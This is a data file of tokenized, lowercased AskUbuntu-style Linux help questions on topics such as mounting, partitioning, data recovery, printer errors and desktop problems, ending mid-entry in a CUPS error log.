436015	skip if server needs a password in local area network	i have a list of ip 's for computers in my lan , i do n't want to enter password for computers that require password , so i would like to skip such pc 's . gvfs-mount smb : //servername i 'm using the above command for mounting , so how to skip pc 's that require password from trying to mount.. i had a script which consists of a list like gvfs-mount smb : //servername1 , gvfs-mount smb : //servername2 , gvfs-mount smb : //servername3 ... and when i run the script i would like to skip pc 's with password
436018	partitioning : shrink ubuntu ( extended ) , expand windows	i have backups up everything , but i 'm still uneasy about the process and would like confirmation . i 'd rather do this one time correctly . i want to shrink /dev/sda6/ by 200gb and reallocate it to /dev/sda2 . i boot a livecd and turn off linuxswap ( locked otherwise ) . i 've been reading that it is very hard to move `` left '' when partitioning and other askubuntu threads are confusing me . do i need to resize /dev/sda6 by 200gb `` preceding '' ( rather than `` following '' ) , and then resize /dev/sda4 by 200gb ? a little guidance would ease my nerves of messing everything up . thank you ahead of time .
436023	could n't find executable named error ubuntu	i am trying to fly the ardrone parrot 2.0 using tum_ardrone ptam module . it is a rospackage , so i had to make it using rosmake tum_ardrone the above compiled with 0 failures . however , when i do the following commad rosrun tum_ardrone drone_stateestimation i get the following error [ rosrun ] could n't find executable named drone_stateestimation below /home/bojan/fuerte_workspace/tum_ardrone i tried to google and get a solid pipelined solution to check for the reason for this error and solve it , but i did not get it . am new to ubuntu , thus your help is much appreicated . this error does n't seem to be package specific since the same package works fine in another laptop i tested . am runnign ubuntu in vmware . does that make any difference ? thanks in advance
436024	how do i make terminal always visible ( transperent ) on my workspace using devilspie ?	i was reading full circle magazine issue 7 where there was a small guide on this topic . i have tried a lot but it did n't work.when i type in terminal devilspie it shows this error message : no s-expressions loaded , quiting .
436028	keyboard does n't work after waking ubuntu from suspend , wakes automatically after opening lid	i have ubuntu 13.10 installed on toshiba p55-a5200 . the keyboard does n't work after waking it up from suspend , so i have to restart it . also , whenever i open the lid it wakes up without me pressing the power button . this is a little frustrating . your help is appreciated .
436031	how can i recover my data after formatting ubuntu with ubuntu ?	i blew up everything while installing ubuntu 13.04 in a machine with ubuntu 12.04 installed in it . i erased the whole data accidentally . i had a separate space called backup in older os . having ubuntu 13.04 currently installed , i want my previous data with ubuntu 12.04 back . i came through how can i recover my data after replacing windows with ubuntu ? [ duplicate ] , but in my case it 's ubuntu 13 replaced by ubuntu 12 . in a live mode of ubuntu 13.04 , i downloaded and run testdisk . step 1 : i proceeded with a media ( /dev/sda ) from list select a media ( use arrow keys , then press enter ) : > disk /dev/sda - 640 gb / 596 gib - wdc wd6400bevt-22a0rt0 disk /dev/sdb - 4022 mb / 3835 mib - sandisk u3 cruzer micro step 2 : then i selected intel as partition and then analyse category step 3 : i only see following partitions disk /dev/sda - 640 gb / 596 gib - chs 77825 255 63 current partition structure : partition start end size in sectors 1 * linux 0 32 33 77345 77 44 1242550272 2 e extended 77345 110 12 77825 70 5 7708674 5 l linux swap 77345 110 14 77825 70 5 7708672 step 4 : i chose to go quick search disk /dev/sda - 640 gb / 596 gib - chs 77825 255 63 partition start end size in sectors > * linux 0 32 33 77345 77 44 1242550272 p linux swap 77345 110 14 77825 70 5 7708672 step 5 : in first partition of the list ( linux ) , i only see currently installed files . ( as 'm looking for older backup folder there . ) > drwxr-xr-x 0 0 4096 15-mar-2014 23:59 . drwxr-xr-x 0 0 4096 15-mar-2014 23:59 .. drwx -- -- -- 0 0 16384 15-mar-2014 23:55 lost+found drwxr-xr-x 0 0 12288 18-mar-2014 22:59 etc drwxr-xr-x 0 0 4096 18-mar-2014 22:41 media drwxr-xr-x 0 0 4096 16-mar-2014 00:01 bin drwxr-xr-x 0 0 4096 16-mar-2014 00:02 boot drwxr-xr-x 0 0 4096 24-apr-2013 22:51 dev drwxr-xr-x 0 0 4096 15-mar-2014 23:58 home drwxr-xr-x 0 0 4096 16-mar-2014 00:01 lib drwxr-xr-x 0 0 4096 24-apr-2013 22:47 lib64 drwxr-xr-x 0 0 4096 19-apr-2013 14:48 mnt drwxr-xr-x 0 0 4096 24-apr-2013 22:46 opt drwxr-xr-x 0 0 4096 19-apr-2013 14:48 proc drwx -- -- -- 0 0 4096 16-mar-2014 00:11 root drwxr-xr-x 0 0 4096 24-apr-2013 22:51 run drwxr-xr-x 0 0 12288 16-mar-2014 00:02 sbin drwxr-xr-x 0 0 4096 12-jun-2012 00:21 selinux drwxr-xr-x 0 0 4096 24-apr-2013 22:46 srv drwxr-xr-x 0 0 4096 30-jan-2013 18:43 sys drwxrwxrwt 0 0 4096 18-mar-2014 22:59 tmp drwxr-xr-x 0 0 4096 24-apr-2013 22:46 usr drwxr-xr-x 0 0 4096 18-mar-2014 22:59 var lrwxrwxrwx 0 0 29 15-mar-2014 23:59 vmlinuz lrwxrwxrwx 0 0 33 15-mar-2014 23:55 initrd.img.old lrwxrwxrwx 0 0 32 15-mar-2014 23:59 initrd.img drwxr-xr-x 0 0 4096 15-mar-2014 23:58 cdrom step 6 : in a deeper search , analyse cylinder 2041/77824 02 % linux 0 32 33 77345 77 44 1242550272 linux 0 32 31 60 206 16 974848 linux 0 32 31 60 206 16 974848 linux 0 32 31 60 206 16 974848 linux 0 32 33 77345 77 44 1242550272 linux 0 32 33 77345 77 44 1242550272 linux 0 32 33 77345 77 44 1242550272 linux 0 32 33 77345 77 44 1242550272 linux 60 238 51 12218 100 42 195309568 linux 0 32 33 77345 77 44 1242550272 linux 60 238 51 12218 100 42 195309568 linux 60 238 51 12218 100 42 195309568 linux 0 32 33 77345 77 44 1242550272 linux 0 32 33 77345 77 44 1242550272 linux 60 238 51 12218 100 42 195309568 linux 60 238 51 12218 100 42 195309568 linux 0 32 33 77345 77 44 1242550272 linux 60 238 51 12218 100 42 195309568 linux 854 98 13 924 127 35 1126400 linux 0 32 33 77345 77 44 1242550272 when i press enter , i get something like following in the list disk /dev/sda - 640 gb / 596 gib - chs 77825 255 63 partition start end size in sectors > linux 0 32 31 60 206 16 974848 linux 0 32 33 77345 77 44 1242550272 linux 60 238 51 12218 100 42 195309568 linux 854 98 13 924 127 35 1126400 linux 1596 214 27 1666 243 49 1126400 * linux swap 77345 110 14 77825 70 5 7708672 when i list files for the same partition , i get following message , linux 0 32 31 60 206 16 974848 ca n't open filesystem . filesystem seems damaged . i want experienced answers . references test disk - how to recover files from a faulty hard-drive
436033	gnome 3 nautilus - custom bookmarks	i 'm just upgrading to ubuntu 13.10 with gnome 3 classic . could you say me how i can create bookmark [ link or signet ] on the left navigation panel of nautilus ? before upgrading i had a bookmarks option in main menu ... but i did n't find it in this new version ...
436036	how to login in terminal as root anytime when i open terminal ?	i do n't want to type sudo and my password everytime.i think it is really annoying.is there any command or option which will consider you root user when you open terminal , everytime when you open terminal .
436040	ctrl-l , ctrl-a , ctrl-e do not work any more	i accidentally deleted some files ( do not remember what files ) , then ctrl-l , ctrl-a , ctrl-e do not work any more on my mac . i tried to reinstall bash using brew install bash . but the problem is still there .
436043	how do i download ( not just mount ) a box.com-based folder ?	i 'm looking to completely mirror a folder , not just mount it . i 've tried cadaver and i 've spent a good amount of time researching this . i also tried using the box-sync repo .
436045	change language layout does not work when i have a menu selected	what i meanâś i open synapse and hit alt+shift but it does not change the language , the same happens if i have to change keyboard layout but i have already clicked to a menu that gives me the option to choose from several options ( e.g . countries ) . p.s . sorry but i do n't really know how to describe it ... edit : i have ubuntu 13.10 with unity
436047	where do i find vlc 's source code ?	i have installed vlc 2.0.8 twoflower and i was wondering where i can find vlc 's source code . i am using ubuntu 13.10 and i do n't plan to do anything with the code , i just want to have a look at it .
436049	internal error [ network ]	i installed ubuntu 13.10 in my new laptop sony vaio svf1521n6e , and i have no wireless connection , and when i try to open the network settings i get a internal error . i attach some screens . internal error screens : http : //imgur.com/a/guszc i am trying to open system settings > > network , but no one window appear and i get the internal error . http : //i.imgur.com/skszx3n.png i hope someone can help me . thank you very much
436051	i can not clear syslog but i can remove it ?	why doesnt sudo /dev/null > /var/log/syslog and sudo > /var/log/syslog work , while sudo rm /var/log/syslog works ? !
436052	probably not possible but want to be able to autimatically switch to headphones when plugged into my dac	i have an external sound card ( dac ) that i use for my sound output . it works great in ubuntu 12.04 , the only issue i 've found is ubuntu does n't register me plugging in headphones into the jack on the card , it continues to play 5.1 out through my speakers until i switch manually in the sound settings to analog stereo . sorta inconvenient , though i 'm guessing stemming from the cards manufacturer not really supporting their proprietary drivers . is there anyway for me to get this feature to work ? it is a feature of the card , i 've used it with windows and it automatically ( well most of the time , some hiccups ) would switch . i do have onboard audio , though i 'd rather not use it . the dac is creative studio sound blaster x-fi 5.1 surround sound pro . i know the drivers are included in alsa on installation of ubuntu , so i suppose it 's an alsa related issue as well .
436059	libreoffice impress does not preserve hyperlinks on ppt export ?	i am having a hard time with exporting impress ' presentation ( in .odp format ) to .ppt format . the problem is that impress wo n't preserve my hyperlinks . i have found a bug on launchpad https : //bugs.launchpad.net/ubuntu/+source/libreoffice/+bug/721386 but it 's for old version of impress . i am using one of the latest 4.2.2 . any solutions for that ? does this work for you ?
436060	how do i edit all autostart applications ?	in ubuntu 13.10 only very few applications are managed by the startup applications application : how do i access for example the bluetooth indicator ? is there a gui alternative to editing the config files in /etc/xdg/autostart/ and ~/.config/autostart/ ?
436062	delete directory indirectly inside of itself	i have a directory inside itself . how do i delete it . ~/.local/share/trash/files $ ls devices/ reg-dummy ~/.local/share/trash/files $ ls devices/reg-dummy/ subsystem ~/.local/share/trash/files $ ls devices/reg-dummy/subsystem/ devices also ~/.local/share/trash/files $ find devices/ | head -n 20 devices/ devices/reg-dummy devices/reg-dummy/subsystem devices/reg-dummy/subsystem/devices devices/reg-dummy/subsystem/devices/reg-dummy devices/reg-dummy/subsystem/devices/reg-dummy/subsystem devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy/subsystem devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy/subsystem devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy/subsystem devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy/subsystem devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy/subsystem/devices/reg-dummy also , although my brain ca n't solve the halting problem , it appears that sudo rm -rf devices goes on forever without producing output . ~/.local/share/trash/files $ sudo rm -rf devices ^c~/.local/share/trash/files $ same thing for perl -e 'use file : :path qw ( remove_tree ) ; remove_tree ( `` $ env { home } /.local/share/trash/files/devices '' ) ' . same thing for du -s devices/ . same thing for du -sch ~/.local/share/trash/ other commands $ cd ~/.local/share/trash/files/devices/reg-dummy/subsystem/devices/ $ ls -ldi 8131921 drwxr-xr-x 3 theking theking 4096 mar 17 19:43 . $ cd reg-dummy/subsystem/devices/ $ ls -dli 8131926 drwxr-xr-x 3 theking theking 4096 mar 17 19:43 . $ find .local/share/trash/files/ -maxdepth 1 -delete find : can not delete `.local/share/trash/files/devices ' : directory not empty find : can not delete `.local/share/trash/files/ ' : directory not empty i do n't want it stuck in my trash forever ! note : i was making a crude backup of a computer by simply using scp , and but i ran out of space and then this happened .
436063	how can i format my usb in lubuntu 13.10 ?	i 'd created a bootable usb drive to install lubuntu and now i 'd like to format it so i could use it normally . how can i do that ?
436068	ubuntu terminal `` shortcut-key ''	i just changed the `` short-keys '' in ubuntu . i set ctrl+c for copy . my fault ... so now i ca n't use ctrl+c for killing the process in the terminal . but it is necessary for me to do this . how can i change the shortcut key ? maybe so that esc is for killing the process , or some other combination ?
436072	sftp restrict access to /var/www/sitename folder only	i have a created an external user to access our server and pointed them to the folder /var/www/sitename but they are able to browse other directories , which i want to prohibit . how can this be achieved ?
436073	how to clone a dual boot system to an ssd in my case ?	i 've purchased a samsung 840 pro 256gb ( which comes with magician , the clonning software for samsung ) . i was willing to clone my ( c : ) partition ( 166.44gib ) and my ubuntu ( 12.04 ) partition ( s ) to the ssd . and keep the ( d : ) partition in my hdd . gparted since i read alot of methods to do so , here and there , and since i 'm not quite confortable yet with ubuntu , i 'm a bit confused . i have some important data in both partitions that i do n't want to loose . if someone can help me with that , it would be very kind of you . thank you .
436076	how can i fix shaking windows when i shift between workspaces ?	i 'm using ubuntu 13.10 . when i change a window from one workspace to another , the transition animation shows tiny vertical and horizontal lines and the window shakes a little bit , i.e. , the transition is not smooth . i remember that something like this happened in other versions ( i think it was in 12.04 ) and there was a way to fix it . has anyone else experience something like this , and is there a way to fix it ? thanks . ps : i 'm not sure if this is a bug , maybe not , and there is a simple way to correct it , that 's why i 'm asking .
436078	how start desktop environment from recovery mode command-line ?	my ubuntu 13.10 works well . but i 'm curious to run desktop environment manually . i go to recovery mode , then in the command-line , i enter this command : startx but it shows only some errors .
436080	audio player that supports zip archives	is there anything better than rhythmbox , which does not support navigation between tracks inside archives ?
436081	help me fix my improper removal of files please	upon opening terminal i get a notification : bash : /home/kylekroeck/public/ccp4-6.4.0/bin/ccp4.setup-sh : no such file or directory my /.bashrc file : # ~/.bashrc : executed by bash ( 1 ) for non-login shells . # see /usr/share/doc/bash/examples/startup-files ( in the package bash-doc ) # for examples # if not running interactively , do n't do anything case $ - in *i* ) ; ; * ) return ; ; esac # do n't put duplicate lines or lines starting with space in the history . # see bash ( 1 ) for more options histcontrol=ignoreboth # append to the history file , do n't overwrite it shopt -s histappend # for setting history length see histsize and histfilesize in bash ( 1 ) histsize=1000 histfilesize=2000 # check the window size after each command and , if necessary , # update the values of lines and columns . shopt -s checkwinsize # if set , the pattern `` ** '' used in a pathname expansion context will # match all files and zero or more directories and subdirectories . # shopt -s globstar # make less more friendly for non-text input files , see lesspipe ( 1 ) [ -x /usr/bin/lesspipe ] & & eval `` $ ( shell=/bin/sh lesspipe ) '' # set variable identifying the chroot you work in ( used in the prompt below ) if [ -z `` $ { debian_chroot : - } '' ] & & [ -r /etc/debian_chroot ] ; then debian_chroot= $ ( cat /etc/debian_chroot ) fi # set a fancy prompt ( non-color , unless we know we `` want '' color ) case `` $ term '' in xterm-color ) color_prompt=yes ; ; esac # uncomment for a colored prompt , if the terminal has the capability ; turned # off by default to not distract the user : the focus in a terminal window # should be on the output of commands , not on the prompt # force_color_prompt=yes if [ -n `` $ force_color_prompt '' ] ; then if [ -x /usr/bin/tput ] & & tput setaf 1 > & /dev/null ; then # we have color support ; assume it 's compliant with ecma-48 # ( iso/iec-6429 ) . ( lack of such support is extremely rare , and such # a case would tend to support setf rather than setaf . ) color_prompt=yes else color_prompt= fi fi if [ `` $ color_prompt '' = yes ] ; then ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \ [ \033 [ 01 ; 32m\ ] \u @ \h\ [ \033 [ 00m\ ] : \ [ \033 [ 01 ; 34m\ ] \w\ [ \033 [ 00m\ ] \ $ ' else ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\ $ ' fi unset color_prompt force_color_prompt # if this is an xterm set the title to user @ host : dir case `` $ term '' in xterm*|rxvt* ) ps1= '' \ [ \e ] 0 ; $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\a\ ] $ ps1 '' ; ; * ) ; ; esac # enable color support of ls and also add handy aliases if [ -x /usr/bin/dircolors ] ; then test -r ~/.dircolors & & eval `` $ ( dircolors -b ~/.dircolors ) '' || eval `` $ ( dircolors -b ) '' alias ls='ls -- color=auto' # alias dir='dir -- color=auto' # alias vdir='vdir -- color=auto' alias grep='grep -- color=auto' alias fgrep='fgrep -- color=auto' alias egrep='egrep -- color=auto' fi # some more ls aliases alias ll='ls -alf' alias la='ls -a' alias l='ls -cf' # add an `` alert '' alias for long running commands . use like so : # sleep 10 ; alert alias alert='notify-send -- urgency=low -i `` $ ( [ $ ? = 0 ] & & echo terminal || echo error ) '' `` $ ( history|tail -n1|sed -e '\ '' s/^\s* [ 0-9 ] \+\s*// ; s/ [ ; & | ] \s*alert $ //'\ '' ) '' ' # alias definitions . # you may want to put all your additions into a separate file like # ~/.bash_aliases , instead of adding them here directly . # see /usr/share/doc/bash-doc/examples in the bash-doc package . if [ -f ~/.bash_aliases ] ; then . ~/.bash_aliases fi # enable programmable completion features ( you do n't need to enable # this , if it 's already enabled in /etc/bash.bashrc and /etc/profile # sources /etc/bash.bashrc ) . if ! shopt -oq posix ; then if [ -f /usr/share/bash-completion/bash_completion ] ; then . /usr/share/bash-completion/bash_completion elif [ -f /etc/bash_completion ] ; then . /etc/bash_completion fi fi # added by ccp4 package manager : source /home/kylekroeck/public/ccp4-6.4.0/bin/ccp4.setup-sh i had installed a program suite called ccp4 but was having issues with some of the programs . i thought i had removed the files in an acceptable manner but when i open terminal i get this error message at the top and i think this is preventing the proper install of this program .
436086	install netgear wireless adapter with no internet	just installed ubuntu 12.04 lts and i have a netgear wireless adapter a6200 . i have the disk but i need to work out a way to get the .inf files on to the machine . i do not have the ability to access the internet via ethernet on the ubunti machine . lsusb command - bus 003 device 002 : id 0846:9050 netgear , inc . i have a laptop next to me with wireless access and a usb stick so i can download packages ans transfer across . please tell me how i can do this ? edit : i have now installed some a6200 drivers using ndiswrapper and i can use modprobe ndiswrapper which loads the driver and i can see the wireless network , however it does n't except the wireless key . it 's 100 percent the correct key but it just tries to connect for around 2 minutes and then the box pops back up asking for the authentication key again ...
436089	audio on firefox does n't work after using hydrogen	i am new to ubuntu and just installed ubuntu studio . after googling a previous audio problem regarding no sound on youtube , i uninstalled pulseaudio . audio works fine both on youtube and hydrogen on their own . but i 've found that after using hydrogen , the audio is cut off from everything else after closing it . ( skype , firefox ) how do i go about troubleshooting this ? thank you
436090	i 'm getting the all too common error : webserver is fetching rather than executing cgi files when installing bugzilla	i am a noob so do n't hate me . i have been chasing this all day . i am getting the cgi script returned when i try to start the site from the browser . when i run the testserver script i get the oh so common error when testing cgi execution . below is my directory info . bugzilla is located in /usr/local/bugzilla-4.2.2/ and i am using a symbolic link to access the install . my localhost works fine so i know apache is running . i have looked at lots of posts both inside and outside ubuntu and nothing seems to be the right answer . any help is greatly appreciated . its a perl cgi script . in the setup instructions there was no directive to setup sites-enables or sites-available . here is the link . how do i install bugzilla ? apache2.conf details alias /bugzilla/ /var/www/bugzilla/ # < directory `` /usr/local/bugzilla-4.4.4 '' > < directory /var/www/bugzilla > addhandler cgi-script .cgi options +execcgi +followsymlinks +indexes directoryindex index.cgi index.html allowoverride all < /directory > here is a log entry from apache when the testserver script tries to test cgi execution . it seems to be getting the script but just fetching like its ignoring the addhandler variable . 127.0.0.1 - - [ 18/mar/2014:15:53:37 -0700 ] `` get /bugzilla/testagent.cgi http/1.1 '' 200 840 `` - '' `` libwww-perl/6.05 '' â
436091	error installing vst using wine lmms	i am trying to install the alchemy player plugin on ubuntu 13.10 i am using vestige in lmms to open the .dll file . it tries to load for a second and then says '' the vst-plugin /home/isaac/lmms/vst-data/alchemy.dll could not be loaded for some reason . if it runs with other vst-software under linux , please contact an lmms-developer ! '' i also installed lmms with wine and it worked but it was to laggish and glitchy and there was no audio , when i loaded the .dll on the wine install it prompted me to choose the data folder for the vst and it did n't prompt on the linux version i updated wine to 1.6 and it still does n't work .
436093	wrapping workspaces in cinnamon environment	i 'm running ubuntu 12.10 with the cinnamon environment . i 'm wondering if it 's possible to make it so i can wrap workspace switching ( so when i reach the last workspace , shifting right again will bring me to the first workspace ) . this would be far less tedious ... edit as per terdon 's observing : my cinnamon version is 2.0.14
436094	grunt installation error in 12.04	i tried to install grunt using npm , which errors out , without giving me much detail into the reasoning.. reproducing the log here . npm -v 1.1.4 sudo npm install -g grunt-cli npm http get https : //registry.npmjs.org/grunt-cli npm err ! error : failed to fetch from registry : grunt-cli npm err ! at /usr/share/npm/lib/utils/npm-registry-client/get.js:139:12 npm err ! at cb ( /usr/share/npm/lib/utils/npm-registry-client/request.js:31:9 ) npm err ! at request._callback ( /usr/share/npm/lib/utils/npm-registry-client/request.js:136:18 ) npm err ! at request.callback ( /usr/lib/nodejs/request/main.js:119:22 ) npm err ! at request. < anonymous > ( /usr/lib/nodejs/request/main.js:212:58 ) npm err ! at request.emit ( events.js:88:20 ) npm err ! at clientrequest. < anonymous > ( /usr/lib/nodejs/request/main.js:412:12 ) npm err ! at clientrequest.g ( events.js:156:14 ) npm err ! at clientrequest.emit ( events.js:67:17 ) npm err ! at httpparser.parseronincomingclient [ as onincoming ] ( http.js:1256:7 ) npm err ! you may report this log at : npm err ! < http : //bugs.debian.org/npm > npm err ! or use npm err ! reportbug -- attach /home/raghav/npm-debug.log npm npm err ! npm err ! system linux 3.5.0-47-generic npm err ! command `` /usr/bin/nodejs '' `` /usr/bin/npm '' `` install '' `` -g '' `` grunt-cli '' npm err ! cwd /home/raghav npm err ! node -v v0.6.19 npm err ! npm -v 1.1.4 npm err ! message failed to fetch from registry : grunt-cli npm err ! npm err ! additional logging details can be found in : npm err ! /home/raghav/npm-debug.log npm not ok tried to confirm if the server i actually accessible , and here it is - ping registry.npmjs.org ping a.sni.fastly.net ( 103.245.222.162 ) 56 ( 84 ) bytes of data . 64 bytes from 103.245.222.162 : icmp_req=1 ttl=50 time=243 ms
436096	uefi and `` reserved bios boot area ''	i purchased an new notebook wich has a pre-installed windows 8 ( upgraded to windows 8.1 ) . configuration : uefi secure boot ssd + hdd i downloaded kubuntu 13.10 , prepared a bootable usb stick and made some free disk space to setup a dual-boot system . in order to boot from the usb stick i had to turn-off secure boot and switch to `` csm '' ( `` compatibility support module '' ; legacy mode ) ! ? ? now in the `` prepare partitions '' ( manual ) step of the installer , /dev/sda ( hdd ) is pre-selected for `` device for boot loader installation '' . as far i can see , the efi partition is /dev/sdb1 ( ssd ; fat32 ) however . i tried /dev/sdb1 /dev/sdb /dev/sda but i always get an error about `` reserved bios boot area '' . now as i understand , this `` reserved bios boot area '' is not needed for uefi . so what should i do ?
436097	problem installing ubuntu on older pc	i am trying to install ubuntu 13.10 32 bit on older pc with only 256mb of ram but every time it gets to the screen where choice needs to be done between demo and install it just hangs and i can not go any further . sometimes it hangs even sooner on the purple screen . the mouse get sluggish and clicking on buttons does not do anything . is it possible to run this os on this older pc and if so what steps should i take to get it installed ? ? if i can not use ubuntu on this pc can someone recommend another linux os which can be used ? ? just trying to move away from windows xp .
436100	no video after install	i have installed ubuntu 12.04.4 32-bits on a 2003 era dell inspiron 1100 laptop , and i get no video at all , not even any text during boot .
436103	search box in the dash has garbled and obscured text	i have a 4-month-old notebook with a new hard drive ( under warranty ) . search text in the dash is garbled and partially obscured , as if the text is bigger than the search field . i appreciate any help .
436108	looking to change gpus	i currently have a radeon hd 7970 gpu installed and i am looking at buying a nvidia gtx770 . i would like to know if the nvidia one is better , in particular to wine gaming , and blender rendering i know nvidia is better , but would like to know how well the nvidia cards work on linux , i have only used amd cards so far .
436109	problem installing applications on ubuntu gnome 14.04	i just installed beta version of ubuntu gnome 14.04 and apparently i ca n't install any old applications such as : sopcast 0.8.5 http : //linuxg.net/how-to-install-sopcast-0-8-5-on-ubuntu-13-1013-04-linux-mint-1615-and-pear-os-8/ or acestream player http : //forum.torrentstream.org/index.php ? topic=1933.0 is there a way to install these applications or should i wait until they start supporting 14.04 ?
436110	ubuntu 13.10 unity not loading	ok . here 's the situation . the only thing that will load is the wallpaper and the icons i had on my desktop . the launcher on the left dos not load , and the taskbar on the top does not load . the final things i did on my laptop before unity died that i remember are as such : uninstalled libreoffice 4.2 so i could install 4.2.2 , installed adobe flash player , installed ( i think its called ) gimp photo editor , installed gnash . icons started dissapearing off my left side launcher that i had locked to it , the terminal would not led me cd to the libre 4.2.2 folder . the spotify icon became a question mark . my home folder crashed randomly . my backup failed . so i restarted my pc . when it came to the log on screen it did not show me the option to change desktop enviroments ( gnome fallback , unity , etc ) and when i logged on all thats there is my background and the desktop icons i had on it . steam is just a white square . i need to install libre . and i need my computer to work for school tomorrow . please help me to get my pc to work ps i installed that tool to change graphic settings to see if i could enable the unity plugin but i could not find it . i think its called something like ccsm or something like that . it did not work . help please
436113	network printing failed in kubuntu	i have a brother mfc-8510dn network printer that i 'm trying to print a document through using cups . it fails and gives an error . i cleaned /var/spool/cups/ and i still did n't work . i checked /var/log/cups/error_log , and found this error : [ 18/mar/2014:19:15:38 -0400 ] [ cups-driverd ] bad driver information file `` /usr/share/cups/drv/cupsfilters.drv '' ! w [ 18/mar/2014:19:16:42 -0400 ] addprofile failed : org.freedesktop.dbus.error.unknownmethod : no such interface `org.freedesktop.colormanager ' on object at path /org/freedesktop/colormanager/devices/cups_brother_mfc_8510dn e [ 18/mar/2014:19:16:46 -0400 ] returning ipp server-error-not-accepting-jobs for print-job ( ipp : //utf-8 @ localhost:631/printers/brother_mfc-8510dn ) from localhost e [ 18/mar/2014:19:17:58 -0400 ] [ cups-driverd ] bad driver information file `` /usr/share/cups/drv/cupsfilters.drv '' ! w [ 18/mar/2014:19:18:31 -0400 ] createprofile failed : org.freedesktop.colormanager.alreadyexists : profile id 'brother_mfc-8510dn-gray.. ' already exists w [ 18/mar/2014:19:18:31 -0400 ] createdevice failed : org.freedesktop.colormanager.alreadyexists : device id 'cups-brother_mfc-8510dn ' already exists w [ 18/mar/2014:19:18:35 -0400 ] createprofile failed : org.freedesktop.colormanager.alreadyexists : profile id 'brother_mfc-8510dn-gray.. ' already exists w [ 18/mar/2014:19:18:35 -0400 ] createdevice failed : org.freedesktop.colormanager.alreadyexists : device id 'cups-brother_mfc-8510dn ' already exists w [ 18/mar/2014:19:18:38 -0400 ] createprofile failed : org.freedesktop.colormanager.alreadyexists : profile id 'brother_mfc-8510dn-gray.. ' already exists w [ 18/mar/2014:19:18:38 -0400 ] createdevice failed : org.freedesktop.colormanager.alreadyexists : device id 'cups-brother_mfc-8510dn ' already exists w [ 18/mar/2014:19:18:42 -0400 ] createprofile failed : org.freedesktop.colormanager.alreadyexists : profile id 'brother_mfc-8510dn-gray.. ' already exists w [ 18/mar/2014:19:18:42 -0400 ] createdevice failed : org.freedesktop.colormanager.alreadyexists : device id 'cups-brother_mfc-8510dn ' already exists w [ 18/mar/2014:19:18:45 -0400 ] createprofile failed : org.freedesktop.colormanager.alreadyexists : profile id 'brother_mfc-8510dn-gray.. ' already exists w [ 18/mar/2014:19:18:45 -0400 ] createdevice failed : org.freedesktop.colormanager.alreadyexists : device id 'cups-brother_mfc-8510dn ' already exists w [ 18/mar/2014:19:18:49 -0400 ] createprofile failed : org.freedesktop.colormanager.alreadyexists : profile id 'brother_mfc-8510dn-gray.. ' already exists w [ 18/mar/2014:19:18:49 -0400 ] createdevice failed : org.freedesktop.colormanager.alreadyexists : device id 'cups-brother_mfc-8510dn ' already exists w [ 18/mar/2014:19:18:53 -0400 ] createprofile failed : org.freedesktop.colormanager.alreadyexists : profile id 'brother_mfc-8510dn-gray.. ' already exists w [ 18/mar/2014:19:18:53 -0400 ] createdevice failed : org.freedesktop.colormanager.alreadyexists : device id 'cups-brother_mfc-8510dn ' already exists w [ 18/mar/2014:19:19:34 -0400 ] createprofile failed : org.freedesktop.colormanager.alreadyexists : profile id 'brother_mfc-8510dn-gray.. ' already exists w [ 18/mar/2014:19:19:34 -0400 ] createdevice failed : org.freedesktop.colormanager.alreadyexists : device id 'cups-brother_mfc-8510dn ' already exists e [ 18/mar/2014:19:19:45 -0400 ] returning ipp server-error-not-accepting-jobs for print-job ( ipp : //utf-8 @ localhost:631/printers/brother_mfc-8510dn ) from localhost e [ 18/mar/2014:19:20:00 -0400 ] [ cups-driverd ] bad driver information file `` /usr/share/cups/drv/cupsfilters.drv '' ! w [ 18/mar/2014:19:20:21 -0400 ] createprofile failed : org.freedesktop.colormanager.alreadyexists : profile id 'brother_mfc-8510dn-gray.. ' already exists w [ 18/mar/2014:19:20:21 -0400 ] createdevice failed : org.freedesktop.colormanager.alreadyexists : device id 'cups-brother_mfc-8510dn ' already exists e [ 18/mar/2014:19:20:27 -0400 ] returning ipp server-error-not-accepting-jobs for print-job ( ipp : //utf-8 @ localhost:631/printers/brother_mfc-8510dn ) from localhost e [ 18/mar/2014:19:30:42 -0400 ] [ cups-driverd ] bad driver information file `` /usr/share/cups/drv/cupsfilters.drv '' ! w [ 18/mar/2014:19:31:26 -0400 ] createprofile failed : org.freedesktop.colormanager.alreadyexists : profile id 'brother_mfc-8510dn-gray.. ' already exists w [ 18/mar/2014:19:31:26 -0400 ] createdevice failed : org.freedesktop.colormanager.alreadyexists : device id 'cups-brother_mfc-8510dn ' already exists e [ 18/mar/2014:19:31:30 -0400 ] returning ipp server-error-not-accepting-jobs for print-job ( ipp : //utf-8 @ 